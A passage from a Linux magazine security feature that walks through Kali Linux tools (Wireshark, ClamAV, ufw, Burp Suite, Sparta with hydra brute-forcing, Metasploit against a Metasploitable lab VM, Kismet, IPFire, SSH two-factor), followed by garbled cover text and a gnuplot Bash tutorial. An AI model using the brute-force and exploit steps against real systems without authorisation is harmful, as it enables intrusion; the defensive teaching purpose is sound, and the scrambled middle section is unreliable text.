ardening. Penetration. Remote exploits. Least privilege. The number of buzzwords and terms related to InfoSec (information security) is almost as great as the various tools out there, each of which boasts that it’ll analyse your network for any potential threat and/or secure it against hackers. In this guide, we will examine some of the network security community’s favourite tools as well as detail the specific threats they address. One of the central tenets of network security is to reduce your ‘attack surface’ through removing unnecessary software. For this reason,

any tools listed here should be run from within a pen-testing distribution of Linux, such as Kali, wherever possible. Before proceeding, make sure you have followed other basic InfoSec best practices, too. Do your network devices have any preinstalled accounts with default passwords that a hacker could exploit? Do the accounts you have installed all require admin privileges to make systemwide changes? Finally, make sure you are aware where your server’s log files are located. Usually they can be found in /var/log. These can be invaluable when simulating an attack on your network.

One of the central tenets of network security is to reduce your ‘attack surface’ through removing unnecessary software

Integrity involves ensuring data is consistent and accurate, both when stored and transmitted. Simpler ways of ensuring this involve setting file permissions and user access controls. More advanced methods may involve use of cryptographic checksums such as MD5 to produce a hash value of a new document to compare to the previous copy. Integrity also encompasses running and maintaining backups of all important data. This is crucial to protect against data loss caused by factors other than unscrupulous hackers, such as a server crashing due to an update or a hardware fault.

Availability Availability focuses on making sure that data is accessible at all times regardless of outside influences like hacking or natural disasters. This may involve using RAID drives to make sure there are several copies, or storing backups on a separate site to make them easier to restore. Availability is better ensured by keeping all software up to date, as well as making sure hardware repairs are carried out rapidly. For data stored on servers, availability also involves providing enough bandwidth to all users to avoid slowdown caused by bottlenecks.



Lock down your system

PEN-TEST YOUR NETWORK WITH KALI LINUX The ultimate Swiss Army knife of ethical hackers The most popular pen-testing distro by far is Kali Linux, the full version of which is available on the cover DVD. When booting, choose the live mode of Kali for now. The default username is root, and its password is toor. On first boot you will also be asked if you want to use the default configuration (four desktops) or just one. Choose accordingly to load the desktop. Click the Applications menu to find that the tools have been neatly categorised for you. For instance, the awesome network tool nmap can be found under Information

Gathering. Do not be alarmed if the same tool is listed twice under separate categories. By way of example, nmap is listed both under Information Gathering and Vulnerability Analysis, as it’s useful for both. As time goes on, you may wish to install additional tools and customise the Kali desktop to your liking. If this is the case, consider installing Kali to a USB stick with persistence. This option is available from the Boot Screen. If you only have access to your target device, consider running Kali in a virtual machine or

even installing to an inexpensive Raspberry Pi computer in order to keep it separate from your personal data. Visit for virtual disk and ‘armhf’ images. Once installed, follow the developers’ instructions on how to tweak the Kali desktop as well as how to upgrade at Many of the tools you will explore in Kali do not have a GUI. Nevertheless they are simple to use and by default Kali will load the man page of each one to show you all available commands.

Although Linux systems cannot be affected by Windows malware, by default they will happily forward on malicious files via internet or USB to more vulnerable machines 20

WATCH LIVE TRAFFIC AND DATA WITH WIRESHARK The definitive network protocol analyser

Wireshark is one of the best-known network analysis tools. It is capable of analysing live traffic as well as data captured to the disk. Wireshark can be launched from the Sniffing and Spoofing category in the Applications menu in Kali Linux. Wireshark has many uses. Chief among these is, should malware make it onto your network, you will be able to analyse malicious files as they enter and also find what data (if any) was successfully stolen. At first the display can seem very garbled, as it will show all data packets. Click the filter bar at the top to pare this down. To start, enter http.request.full_uri to see HTTP requests. Filter displays can be daisychained; for example: http.request.full_uri || ssl.handshake.certificate || dns If you regularly use the same search criteria, go to the Analyze>Filter Display Macros menu to set up a shortcut. For a full list of display filters, visit Right-click any packets of interest and choose Follow>TCP stream to find out more.

Go to File>Save As to choose which packets to save and in what format. These can be opened later in Wireshark and other tools such as Kismet (featured later) for analysis.

The full user guide for Wireshark is available as a PDF from: user-guide-a4.pdf


Check individual files or multiple emails with this powerful antivirus scanner

Although Linux systems cannot be affected by Windows malware, by default they will happily forward on malicious files via internet or USB to more vulnerable machines. ClamAV is an excellent FOSS (free and open source software) antivirus software toolkit. Its database is updated once every few hours and its detection rate beats that of many commercial scanners. In Kali, run:

apt-get install clamav clamav-update clamdscan clamav-daemon …to install the necessary files. You can use the command freshclam to update the virus database manually, but it’s far better to schedule this as a cron job. Run the command:

clamdscan -i <filename> …to scan individual files or folders. The ClamAV daemon will launch automatically once installed, but is not a real-time scanner in that it will not check files as they are written. The application ClamFS, however, can be used to automate checks of folders such as Downloads. Visit for more information.

ClamAV is most commonly used on mail servers running PostFix to prevent the sending of malware and phishing emails through installing the additional program ClamSMTP. After installation, the ClamAV .conf files need to be updated to reflect the ports used by PostFix. This is to make sure all mail is scanned. Visit the developer page at for full instructions.



Lock down your system


Protect your ports with a few quick commands Ufw (Uncomplicated Firewall) and its graphical companion Gufw serve as front-ends for the iptables firewall that is standard in most distributions of Linux. Run the following command:

apt-get install ufw gufw …in Kali to explore further. Gufw is self-explanatory and comes with a switch to enable the firewall, and wizards to block or allow certain ports. There are even preset configurations to allow certain applications and games such as Call of Duty. The command-line version is almost as easy to use. Run:

ufw enable

Then to check firewall status, run:

ufw status verbose By default, all outgoing connections are enabled and all incoming are disabled. You can enable connections with a single command citing the port and protocol. For example, if running a Minecraft server, allow incoming TCP traffic with:

ufw allow 25565/tcp Services such as SSH follow the following syntax:

ufw allow ssh To disable ports or services, replace ‘allow’ with ‘deny’.

Ufw comes pre-installed on Ubuntu and certain other Debian-based distros, but is not ideal for RPM-based ones. For a true cross-platform solution, consider running a dedicated firewall distro such as IPFire (featured later).

Sparta will ask you to specify a range of IP addresses to scan. Once the scan is complete, Sparta will identify any machines, as well as any open ports or running services


Lock down your web applications Burp Suite is an integrated platform for analysing and attacking web applications. The free version, which comes pre-installed in Kali, is likely to meet most admins’ needs. Burp Suite contains an intercepting proxy, which will run on startup on port 8080. This allows you to shunt any browser traffic through it for analysis. Make a request in your web app for the proxy to intercept it. Head over to the Target tab if you wish to view a site map.


From inside the Target tab, find your web application and then right-click one of your nodes. Select the ‘spider from here’ option to make sure there are no links to sensitive resources like databases that hackers might be able to exploit. Back in the Proxy tab, click the Action button, then Send to Intruder to pass intercepted traffic to Burp Suite Intruder. This allows you to automate an attack against one of your web

applications, such as trying to brute-force a user’s password. Click the Intruder tab and then Positions to configure the request template as well as the attack type. The Payloads tab allows you to choose specific payload sets. Click the Start Attack button when ready. For a complete rundown of all Burp Suite’s features, visit the Developer’s support site at

TEST YOUR NETWORK WITH SPARTA A handy Python GUI for nmap and hydra – this is Sparta

Sparta, which comes pre-installed in Kali, serves as a front-end for the awesome nmap and Nkito tools among others, making network enumeration much easier. Upon launch, Sparta will ask you to specify a range of IP addresses to scan. Once the scan is complete, Sparta will identify any machines, as well as any open ports or running services. Where possible, it will also list the OS in the Information tab. If ports 80 or 443 are open, Sparta will also have Nkito run a scan. Nkito essentially checks server software to make sure it’s up to date, as well as ensuring that there are no potentially harmful files or programs. Use the Nkito tab to view the results and the Notes tab to record

your progress. Sparta also incorporates the ‘hydra’ tool, which can be used to brute-force remote authentication services such as SSH. Besides specifying the IP, port and service of the remote host, you’ll need to link to a password list. Kali

includes the ‘rockyou’ list containing thousands of the most commonly used passwords. If you want to test Sparta safely, consider using the Metasploitable virtual machine (featured later), which intentionally includes vulnerabilities.


Add hosts



Prepare your brute-force attack


Gather host information


Launch the brute-force attack

Launch Sparta in Kali by going to Applications>02 Vulnerability Analysis>Sparta. When the window launches, select ‘Click here to add host(s) to scope’. A pop-up will appear asking you to specify an IP range. You can add a single IP address if you already know the host you wish to scan or specify an entire subnet, for example Click Add to Scope to begin the scan. If you’re checking several hosts, right-click each as you go and select Mark as Checked to omit them from future scans.

Hosts are listed in the left-hand pane. Click on each to see open ports in the Services tab. The layout is very clear. Numbered ports are listed under Port and the type of service in question such as SSH or FTP is listed under ‘name’. Use the Information tab to see the total number of open ports. Sparta also uses OS Fingerprinting to determine the host’s operating system, but this is not always accurate. Use the Notes tab at this stage to record any observations you’ve made so far.

Check Nkito scan

This step is optional but recommended. Nkito will automatically scan ports 80 or 443 if it finds them open. Click on the Nkito tab to see the results of the scan. The results can be quite convoluted so it pays to break them down by section. The ‘SSL info’ section in the screenshot, for instance, shows that the default HTTPS certificate used in devices running Broadcom firmware is installed. This certificate is installed on over 480,000 devices so needs to be updated. Other alerts such as ‘No CGI Directories found’ are more self-explanatory. Some may be prefixed with OSVDB- followed by a number. These are Open Source Vulnerability Database designations. Search for further information on individual vulnerabilities.


Select service to brute-force

If you wish to test the strength of passwords on a remote host, click on the Services tab and then right-click on the name of the service you wish to attack, such as SSH. Click ‘Send to Brute’ to specify the IP, port and service you wish to crack. Next, click on the Brute tab and check these are correct.

Once you have clicked on the Brute tab, examine the default options. These are checked so hydra will look for obvious vulnerabilities such as a blank password or a password that’s identical to a username. Below this, you can specify a username and/or password manually or choose from a list. Click the Browse button to view the /usr/share/wordlists folder. Extract rockyou.txt.gz to try some of the most common passwords. Alternatively, use the password list from John the Ripper located in /usr/share/john/password.lst or search for lists online.

Click Run to begin brute-forcing the password of your chosen host. Pay careful attention to the warning message in the pane below. If you haven’t specified a username or password, this will display below. The Threads option at the top-right limits the number of parallel tasks hydra will try to carry out. If you are connecting via SSH, Sparta will warn you that servers usually support a maximum of four. Click Stop at any time to reconfigure before launching the attack again.



Lock down your system

USE THE METASPLOIT FRAMEWORK Test your server against thousands of exploits The free version of MetaSploit Framework (often shortened to ‘msf’) is bundled with Kali Linux. Msf is an open source framework for identifying vulnerabilities as well as developing and running exploit code. Kali also comes with the excellent program armitage, which serves as a GUI for msf. The commercial versions also have a web GUI, but when taking your first tentative steps with the framework, the command-line utility is less overwhelming. Rapid7, the developer of msf, has also created Metasploitable 2, a virtual machine which intentionally contains a number of vulnerabilities that can be exploited by msf, which you can use for the purposes of this tutorial. Kali has a built-in command-line tool, searchsploit, which can be accessed from within msf once a vulnerable port/service has been detected. For a more visually appealing,


categorised view, visit Offensive Security’s online exploit database: Once the exploit has been loaded, you can configure it further with the command show options.

The final step is to run the exploit to discover whether your server is vulnerable to this particular attack. Msf will inform you one way or the other and save the results to its database.

Launch MetaSploit Framework

Launch msf from within Kali by clicking Applications>Exploitation Tools>Metasploit. As with other security tools, you may find msf in more than one category as it can be used in various ways. If you are using the Metasploitable 2 virtual machine in Virtualbox, which is highly recommended, make sure to create a host-only network to which both the Kali and Metasploitable machine are connected. This will prevent either machine from connecting to the real network or the internet.

Run the exploit to see if your server is vulnerable to this particular attack. Msf will inform you one way or another 24


Identify remote hosts

This step simply involves identifying the remote host you wish to exploit through the use of nmap. If you wish, you can use Sparta’s GUI to do this. Alternatively, you can use nmap from the msf command line in the following format:

nmap -v address

For instance:

nmap -v If you wish to scan an entire subnet, use the ‘*’ wildcard. For example:

nmap -v 192.168.0.*


Choose your exploit

The nmap utility or Sparta will list all open ports on your remote host. The next step is to determine whether any of the services running on these ports is vulnerable to an exploit. The easiest way to do this from within msf is to use the searchsploit command. However, running searchsploit irc will show potential exploits for every version of every IRC program. You can narrow this down by scanning the specific port in question to determine the software version. For instance, if you want to


see if the IRC software running on port 6667 on host is vulnerable, run the following command:

nmap -A -p 6667 In Metasploitable 2, this shows more useful information. The machine is running v3.2.8.1 of the Unreal IRC daemon. Running searchsploit unreal irc shows there are two possible exploits for this version of Unreal on Linux. The paths are provided on the right.

Move exploit

Having identified the exploit you wish to use, it must be moved into Metasploit’s modules folder (~.msf4/modules). The easiest way to do this is to open a new Terminal and initially use the mkdir command to create a directory named exploits. Feel free to create subdirectories inside exploits to help organise them. For instance:

cd .msf4/modules mkdir -p exploits/linux/remote

06 05

Load exploit

Once msf has restarted or reloaded, load your exploit with the syntax:

Configure parameters and run

Once the exploit has been loaded, you can type show payloads and show options to configure the tool further. When typing the latter, you will be asked to ‘set RHOST’. This is where you specify the IP address of the remote host. For instance:

use exploit/path/to/exploit set RHOST

Next, use the mv command to place the exploit where msf can see it. For example:

mv /usr/share/exploitdb/platforms/ linux/remote/16922.rb .msf4/modules/ exploits/linux/remote/16922.rb Either restart msf or use the command reload_all to update.

For instance, in the case of the IRC exploit listed previously, type:

If you wish to choose a specific payload, use the same syntax:

use exploit/linux/remote/16922 set PAYLOAD <payload> Note that there is no need to include the file extension. Exploits are written in various programming languages, but msf can recognise these automatically.

Finally, run your exploit with the command:




Lock down your system


A handy utility to detect rogue wireless access points passively

Unsecured wireless access points as well as ad-hoc networks can cause interference with legitimate Wi-Fi areas. They are also potentially an easy way to access passwords and other sensitive data on devices that have not been properly locked down. Kismet, which comes pre-installed in Kali, is a wireless network detector built along similar lines to Netstumbler for Windows. One important difference is that it scans passively, so can discover hidden Wi-Fi networks. While it is commonly used for ‘wardriving’, it is also an enormously useful tool for security admins to make sure no unauthorised devices in your organisation are set up as an access point. Ideally Kismet needs a dedicated Wi-Fi card, which it will place into monitoring mode to detect Wi-Fi points nearby. This will allow your device to stay connected to the internet while Kismet is working. Kismet supports GPS devices. By default the program can be configured to show your device’s current location, but through use of add-ons it can also plot the likely location of other Wi-Fi networks on maps, making it easier to trace their exact location.

KISMET MENUS The Kismet menu allows you to view the Kismet console or add a new interface for scanning. Use the Sort menu to change how networks are displayed

NETWORK AND CLIENT LIST The Network List displays any wireless networks in range. Hidden networks are listed as ‘<Hidden SSID>’. Clients’ MAC addresses are listed below. Use arrow keys to scroll up and down

GENERAL INFO Here Kismet displays information such as detection of new networks and when log files have been displayed. The current wireless interface is also shown at the bottom-right


Configure startup options

On the first run, Kismet will ask you to choose your text colour. Click Next to automatically start Kismet Server. The Startup Options window will appear, where you can configure any startup parameters such as logging. By default, logs are saved to your home folder. Click Start when you are ready to continue.


Set up GPS

This step is optional but highly recommended for hunting down rogue Wi-Fi networks. You will need an external GPS device to be connected to your device. In Kali, run:

sudo apt-get install gpsd gpsd-clients


Install and launch Kismet

If you are using Kali, Kismet is preinstalled and can be launched from the Terminal with the command kismet -l. Otherwise download it from your local repository. Kismet requires root privileges to perform some functions. This carries a risk of bugs or exploits damaging your system. In Kali, where you work as root by default, this shouldn’t be an issue as it is designed with security in mind. For other distributions, consider installing Kismet with the setuid set, which grants root privileges only to those processes that need them.



Add a source

Next you will see a message stating that Kismet started with no sources defined. Click Yes to choose to add a source now. The ‘add source’ window will now appear. Use the command ip link show or ifconfig in the Kali Terminal to display the names of your network interfaces (such as ‘wlan0’) and enter it here. You can also set a name if you wish. Click ‘Add’ when you are done. Kismet will launch and immediately begin to list networks and clients.

…to install the necessary software. Next, connect the GPS dongle and run dmesg | tail -n 5 to determine where it is mounted, such as dev/ttyUSB0. Start the GPS device with: gpsd <device location>. For instance:

gpsd /dev/ttyUSB0 Finally, edit etc/kismet/kismet.conf and uncomment both the lines ‘gpstype=serial’ and ‘gpsdevice=/dev/rfcomm0’ by removing the hash (#) at the start. Amend ‘/dev/rfcomm0’ to the actual location of your GPS device. Restart Kismet to see your current GPS co-ordinates.

TEST WITH METASPLOITABLE 2 Practise pen-testing safely with a virtual machine

Metasploitable is not an application but a virtual machine image based on Ubuntu Linux, which contains a number of intentional vulnerabilities. This can be used to safely test security tools such as Sparta and the MetaSploit Framework. The image itself can be downloaded from (or from the cover disc). You will need virtual machine software such as VirtualBox (available from to run it. The easiest and safest way to pen-test Metasploitable is to run Kali in a virtual machine. VirtualBox can create a hostonly network that will allow Kali and Metasploitable to see one another without being exposed to the rest of your network or the internet. First go to File>Preferences>Network>Host Only Network>Add to create a new network. Next, inside each virtual machine, click Settings>Network and choose Host Only

Adapter in the drop-down ‘Attached To’ menu. The name should populate automatically with the host-only network you created. Under Advanced, set Promiscuous Mode to Allow All. The default username and password for the

virtual machine is msfadmin. A full video tutorial showing how to set up Metasploitable 2 in VirtualBox is available on the Rapid7 website. Point your browser to:

The easiest and safest way to pen-test Metasploitable is to run Kali in a virtual machine


Secure passwords in a multi-user environment with an easy-to-manage database

Syspass is a web password manager written in PHP. Its chief advantage is that it is very lightweight, using an HTML5 and AJAX interface. The database is protected by a master password, and individual user accounts and passcodes are encrypted with AES-256 CBC. SysPass will run on any server using Apache, PHP and MySQL, and is even designed to be run from a portable flash drive for extra security. Once installed, users log in to the interface with their own username and password, which is not shared with others. Any users in your organisation who previously used a personal password database with KeePass can easily migrate their accounts to SysPass. Multiple users can also be added to groups; for instance, all the administrators of a particular website can access the username and password to connect via FTP. The users

that are ‘Application Admin’ or ‘Account Admin’ can view, modify and delete any account. They do this through use of a master password that is required each time global changes such as adding a new user are made.

A demonstration of SysPass’s colourful and simple web interface is available from (use the default passwords shown). Setup instructions can be found at



Lock down your system

PROTECT NETWORKS WITH IPFIRE Quickly set up a highly customisable firewall for all your networks IPFire is an open source firewall Linux distribution. This is an oversimplification, however, as it offers a number of other features such as intrusion detection and support for OpenVPN. IPFire takes a serious approach to security through using an SPI (stateful packet inspection) firewall built on top of netfilter. The setup process allows you to configure your network into different security segments. Each segment is colour-coded. For instance, the green segment is a safe area representing all regular clients connected to the local wired network. The red segment represents the internet. No traffic can pass from red to any of the other segments unless specifically configured in the firewall. The default setup is for a device with two network cards with a red and green segment only. However, during the setup process you can also set up a blue segment for

wireless and an orange one known as the ‘DMZ’ for any public servers. Once setup is complete, you can configure additional options and add-ons through an

intuitive web interface. IPFire is specifically designed for people without large amounts of networking experience and can be deployed in minutes.

No traffic can pass from red to any of the other segments unless specifically configured in the firewall


Download and install IPFire ISO

Visit in order to download the 162MB ISO of IPFire (or get it from the cover disc). The default hardware requirements are very minimal. Click on Other Download Options to obtain flash images as well as versions compiled for ARM architectures. The IPFire site cautions that the software doesn’t run well on devices like the Raspberry Pi, nor does it make use of the hardware random number generator. Consider having a dedicated server for IPFire or running it inside a virtual machine.



Run IPFire setup

The initial setup process is very simple. Select your language and use the space bar to indicate you’ve accepted the terms of the GNU licence. You will then see a notification saying that the system has been installed. The device will restart, at which point you will be asked to select your time zone. Next, you will be asked to select a root password to access the IPFire command line, as well as an admin password for accessing the web interface later on.


Choose network configuration type

Having chosen a host name and local domain settings, you will be taken to the Network Configuration menu. As outlined previously, the default settings are ‘GREEN + RED’. These represent devices with Ethernet attached. If you wish to set up wireless (blue) or a public server (orange-DMZ), select the ‘Network Configuration type’ option, then use the arrow keys to select a different setup. You can change these options post-install but as IPFire cautions, a network restart is required, as well as reassignment of drivers (see Step 4).


Choose driver assignments

Next, in the Network Configuration menu, choose Drivers and Card Assignments. You will now see the Extended Network menu. Select Green in the first instance. The menu will ask you to choose the network card for this interface. If you are unsure which to choose, click Identify and the lights on the port in question will flash for ten seconds.


Set network addresses

Select Address Settings from within the Network Configuration menu. You will then be asked to select the interface in question. Green allows you to assign any valid IP address for a private network here, for instance There are more options for the Red interface, which may vary depending on your ISP. If you do choose to assign a static IP, assign it to a different subnet. For example, if green is 192.168.0.X, red could be 192.168.2.X. If you are unsure, choose DHCP.


Configure DNS and gateway

Back in the Network Configuration menu, choose DNS and Gateway Settings. If you chose DHCP when configuring the Red interface, your ISP’s DNS servers will be used by default and you do not have to configure this further. If you chose a static IP or wish to use a different DNS server such as OpenDNS, enter them here, leaving the Gateway field blank for now. A full list of public DNS servers is available from:


Configure DHCP server

Click on Done on the Network Configuration menu to configure the DHCP server for the ‘Green’ interface. Use the space bar to enable, and then specify your desired range of addresses within the same subnet as your green interface. For instance, if the IP address of your green interface is, you could choose a range of to Note that the ‘Primary DNS’ address is the same as the IP address of your green interface. This is because IPFire uses a DNS proxy. Leave this as is for now.


Open web interface


Configure firewall

Once setup is complete, IPFire will restart and load the firewall. You will see the IPFire Console. Log in as root with the password you previously chose if you wish, then run ifconfig to check that your interfaces are in order. You can access the web interface from any device connected to the network by opening your web browser and entering https://ipfire.localdomain:444. As IPFire uses a self-signed certificate, you may need to confirm a security exception. Enter the username admin and the password you chose previously to display the web interface.

The web interface is easy to follow. Take some time to work through it to use IPFire’s Intrusion Detection System or set up a VPN. For now, click Firewall>Firewall Rules>New Rule. The layout is fairly easy to follow. For instance, if you wish to force clients to block all external DNS servers to prevent DNS hijacking, select GREEN in the Standards Network menu to indicate you wish only to use IPFire’s DNS proxy. Chose RED in the same menu in the Destination section. Finally, under Protocol select DNS and make sure REJECT is highlighted. For a full rundown of the various configurations, consult IPFire’s firewall documentation at: configuration/firewall/start.



Lock down your system


Secure your SSH connections with minimal fuss through two-step verification For system administrators, connecting to servers via SSH is part of a daily routine for running updates and modifying files, but this can leave the system open to exploitation. While you can reduce the chance of this happening by following some SSH best practices such as disabling root log-on, changing the default SSH port and using long passwords, the previously mentioned tools (Sparta in particular) demonstrate how easily vulnerable ports can be scanned and how passwords can be brute-forced. Even using programs like fail2ban to limit unsuccessful login attempts or to ban certain IPs for a certain amount of time is no magic bullet, as many exploitation tools can perform several parallel tasks. The security of your SSH server can be hugely increased through Google Authenticator. This application uses twostep verification services based on a TOTP


(time-based one-time password) algorithm. The authenticator works in tandem with a mobile app, providing 6-8 digit one-time passwords that are required in addition to a

username and password. Note that our guide assumes you are using OpenSSH server, which is the standard for almost all versions of Linux.

Installation For Debian-based servers, run:

apt-get install libpam-googleauthenticator libpam0g-dev …to try to install the authenticator and related software from the repositories. Red Hat, Fedora and CentOS users should run:

yum install pam-devel googleauthenticator If Google Authenticator doesn’t exist in your distribution’s repositories, you can download and compile with the make command from PAM (pluggable authentication module) must also be downloaded and compiled from Consider installing the ‘ntp’ daemon if you have not done so already to ensure the system time is correct, as the Authenticator uses timebased codes.



Generate private key To begin, run the google-authenticator

command. Press ‘y’ to indicate you wish authentication tokens to be time-based. Next, the authenticator will display information about your secret key, along with a QR code which you can scan using the mobile app. You will also see emergency ‘scratch’ codes, which can be used to log in if you ever cannot access your mobile device. Write down this information in a safe place before continuing, then press ‘y’ to update your home folder.


Finalise Google Authenticator preferences

The authenticator will next ask if you wish to disallow multiple uses of the same authentication token. As the authenticator states, selecting this makes man-in-the-middle attacks much harder. You can increase the 30-second period for which tokens are valid in the next step if you wish. Finally, if you do not already have any programs such as fail2ban installed to prevent brute-force attacks, consider pressing ‘y’ to enable rate limiting. This limits attackers to no more than three login attempts every 30 seconds.

08 04

Configure SSH to use Google Authenticator

Open the /etc/ssh/sshd_config file in a text editor. Scroll down to find the line that reads ‘ChallengeResponseAuthentication no’ and change it to ‘ChallengeResponseAuthentication yes’. Save the file. Next, edit the file /etc/pam.d/sshd and add the following line at the very bottom:

auth required pam_google_ You must now restart the SSH service to apply the new changes. Run /etc/init.d/sshd restart to do this. If your SSH server is not already running, use service sshd start.


Test login via SSH

Once your mobile app has been set up, you will see time-based six-digit codes being generated. On a separate device, open Terminal and run ssh user@yourIP. If this is the first time you are connecting via SSH to the server, type ‘yes’ to verify the key fingerprint. You will be asked to type your password in the usual way. Next, the system will ask for your six-digit verification code. Enter this to log in to the server. Switch users and repeat these steps for any additional users who wish to log in via SSH.

Require two-factor authentication for console login

This step is optional but can be used to secure logins via the console on the server itself. In your favourite text editor, simply open /etc/pam.d/ login and add the same line at the bottom as you did in the SSH configuration:

auth required pam_google_ Bear in mind that if an attacker can physically access your machine, they may target the root account or install a hardware keylogger, so this will not be as effective as controlling physical access to the server in the first place.


Bypass two-step verification for the local network

If you find it tiresome having to provide the verification code when connecting over the local network, configure Google Authenticator to ignore these addresses. Edit the file /etc/pam.d/sshd and replace the following line:

07 05

Set up mobile Authenticator app

Using your smartphone or other portable device, visit the Google Play or iTunes Store and install either the official Google Authenticator app or one of its variants such as FreeOTP, which is maintained by Red Hat. The Google Authenticator app for Android is closed source, so from a security perspective FreeOTP is better. Either scan in the QR code generated earlier or manually add the ‘secret key’. The tokens are time-based. If you manually add the key in FreeOTP under the Provisioning section, simply enter user@IPaddress in the ID section. In Google Authenticator you would enter this under Account Name.

Back up your private keys

Although you have written down your private keys and scratch codes in a safe place, for peace of mind, consider using the ‘cp’ command to copy your Google Authenticator file in ~/.google_authenticator to a secure medium. For security reasons, Google Authenticator has no way of regenerating the QR code with your private key after it is run for the first time. Install the program ‘qrencode’ to generate a picture you can open on another device. Once installed, the image can be created with the following command:

auth required pam_google_authenticator. so with this:

auth [success=1 default=ignore] pam_ accessfile=/etc/security/access. conf auth required pam_google_authenticator. so nullok Next, edit /etc/security/access.conf and add the following lines:

qrencode -o qrcode.png 'otpauth:// totp/ MVJECJJWSRB3HWIZR4IFUGFTMXBOZ&issuer=A CME&algorithm=SHA1&digits=6&period=30'

# Two-factor can be skipped on local network + : ALL : + : ALL : LOCAL - : ALL : ALL

Replace ‘ACME’, ‘’ and the secret key with your own data.

Replace ‘’ with your desired range of IP addresses.





OT R ROisB sue OidRe E L P arts this X st E N gu A plete 4-part BU1ILofD the com k


us www.linux








tion Penetraw ith testing rry Pi Raspbe



r Pi into the Turn you security tool ultimate

new Compilee ar out softwFOS S with

ed ms you ne ll progra ap ur tkitPC ark • nm The 7 fu ck down yo • Wiresh to lo enSSH • Snort • chkroo

Get newg your distro updatin


of pages y Pi

ux • • Kali Lin

ntrol Take coBa ofto usesh shell

e Learn how save tim scripts to

rk best netwo What’s the vacy needs? for your pri

insilainde Also ed e ure fram OUTE2 exp

» IPR a Ras Pi pict functions » Maketo work with Go » How

Black k3r HATfroHmac your Pi and

Get more with this add-on HATs 17/06/2016



LUD 167



Learn Go Discover how to work with composite data including arrays, slices types , maps, pointers and structures

file systems like a 001_LUD166_DIGITA


L.indd 1


how to read, interpr et and adjust a Makefile accura tely



Pi to detect and repor t movement

Essential file syste admin revealed m How you can solve compilation problems Create, check and manage Learn


16.04 www.linu k


Program a motion sensor

Get the Raspberry



Use a Pi Zero & a pHAT DAC to make your own music player

err Raspb


S micro:b it VER S RaspbSU erry Pi

Build a web radio

to visu Use the Piin Minecraft music

IPFire • Op

ing by buildvic a network de e s across r own storage Serve file ising you and optim Ns on test


5 projects to con and animate LEDS and build a dice, trol torch and compas s

ical Play mus ft Minecraalise

Lock down yo


Get more from your password man agers

Investigate netw sockets with ss ork

Learn to prograhow m in

16. 4

Recove a failed r data from disk

Resc ious with Kno ppix

ue 18/05/201 17:36 files 6 your prec

Code Ro Scissors, ck, Paper, Learn how Lizard, Spock to recreate game on 001_LU

the Sens a e HAT classic



dd 1





Go Start codi open sourng in Google’s ce language

Find out what proces ses are bound to your ports




• Ubun • Deskttu 16.04 Final • 64-bit op & Server edBeta and 32-bi itions t versions


in OpenS Improve hot 2.0

movies your home in minu tes

Power applica up CoreOS

Debug virtual mawith a Clone yourchine to simp system lify testi ng

Ne sensor tworked displays Display anot live data her Rasp from berry Pi

Take adva tions etcd and ntage of fleet systemd ,



016 12:29

*US Subscribers save up to 40% off the single issue price.

See more at:


Every issue packed with… Programming guides from Linux experts Breaking news from enterprise vendors Creative Raspberry Pi projects and advice Best Linux distros and hardware reviewed

Why you should subscribe... Save up to 37 % off the single issue price Immediate delivery to your device Never miss an issue Available across a wide range of digital devices

Subscribe today and take advantage of this great offer!

Download to your device now


Tam Hanna

started to develop a strange liking for fancy-looking diagrams when he cobbled together a primitive digital phosphor-like persistence feature for a DS-6612 oscilloscope. Ever since, he has tried to find ways to make information more accessible.

Bash masterclass

Bash masterclass

Combine shell scripts and charts Transform your textual information to attractive diagrams using the awesome power of gnuplot

Resources Bash bash/bash.html gnuplot http://www.

Tutorial files available:


Tim van Beveren's research into air safety incidents raised a deeply uncomfortable fact: humans are less suited to processing text and perform much better when provided with graphical input. This is especially important when aircraft systems display information as series of numbers that are not coloured or marked up with additional visual information like an underlying bar chart. Even though the average system script – process computers will not be discussed in this tutorial – is not as critical as a wrong decision by a pilot, providing users with large blocks of text is not particularly economic and leads to errors that could be avoided. Fortunately, creating graphics from a shell script is not a difficult task. The gnuplot program, which has been part of all kinds of UNIX distributions for an age and a half, provides a variety of interesting graphing options and should be well known to anybody who frequents the Linux terminal. It, thus, makes for a more than fitting final installment of our trip through the fascinating realm of shell programming. As gnuplot is not exactly something that gets used every day, most distributions do not include it by default. Fortunately, installing it can be accomplished easily via the apt-get command:

~$ sudo apt-get install gnuplot [sudo] password for [username]:

. . . The basic command contains only local rendering logic. Displaying data can be accomplished by installing either the Qt or the X11 package – your author swears by the following utility:

~$ sudo apt-get install gnuplot-qt Reading package lists... Done . . . After this, gnuplot can be started in interactive mode by entering its name into a terminal window. The first invocation of Gnuplot looks like this:

~$ gnuplot G N U P L O T . . .  Terminal type set to 'wxt'   By default, gnuplot starts out with its graphing terminal option set to wxt: it implies that a pop-up window will be displayed whenever there is something to graph. Our first example uses the plot command, which takes one or more functions which then gets shown:

Figure 1

Above gnuplot can be used to plot commonly used mathematical functions

~$ gnuplot G N U P L O T . . .  Terminal type set to 'wxt' gnuplot> plot sin(x)  

Figure 2

Above Setting the grid property enhances diagram output by including a backdrop grid

Off Licence! gnuplot's name, in fact, is misleading: the product is not distributed under the GPL license, but uses a different licensing regime which does not permit the redistribution of changed source code packages. Developers must, instead, publish patches that can be applied against an officially released version of the program code.

the creation of the script file. Embedding long sequences of text into shell scripts is best handled via the concept of a here document: it is a set of syntax markups that allow you to embed a long string into a shell script. Start out with the following example that demonstrates its use:

#!/bin/bash Entering the command sequence printed leads to a pop-up display showing the contents of Figure 1. While this is not an unattractive option, the product is capable of a lot more. This is accomplished by setting state variables: the gnuplot program, even in interactive mode, is not completely stateless. One way to try this out involves the following command sequence, which is ideally entered right after you're started gnuplot:

gnuplot> set grid gnuplot> plot sin(x), cos(x) gnuplot> When done, you are presented with the output shown in Figure 2. It is obvious that the set grid command motivates the program to display a grid in the background of any rendered diagrams. Be aware that Ctrl+C does not exit the gnuplot application – getting back to the operating system can only be accomplished by entering the quit command followed by the Return key.

You're welcome HERE

Even though running gnuplot directly is a fun way to get some charts on the screen, shell scripts work better if they can control the execution en masse via a set of parameters defined during

Humans are less suited to processing text and perform much better when provided with graphical input

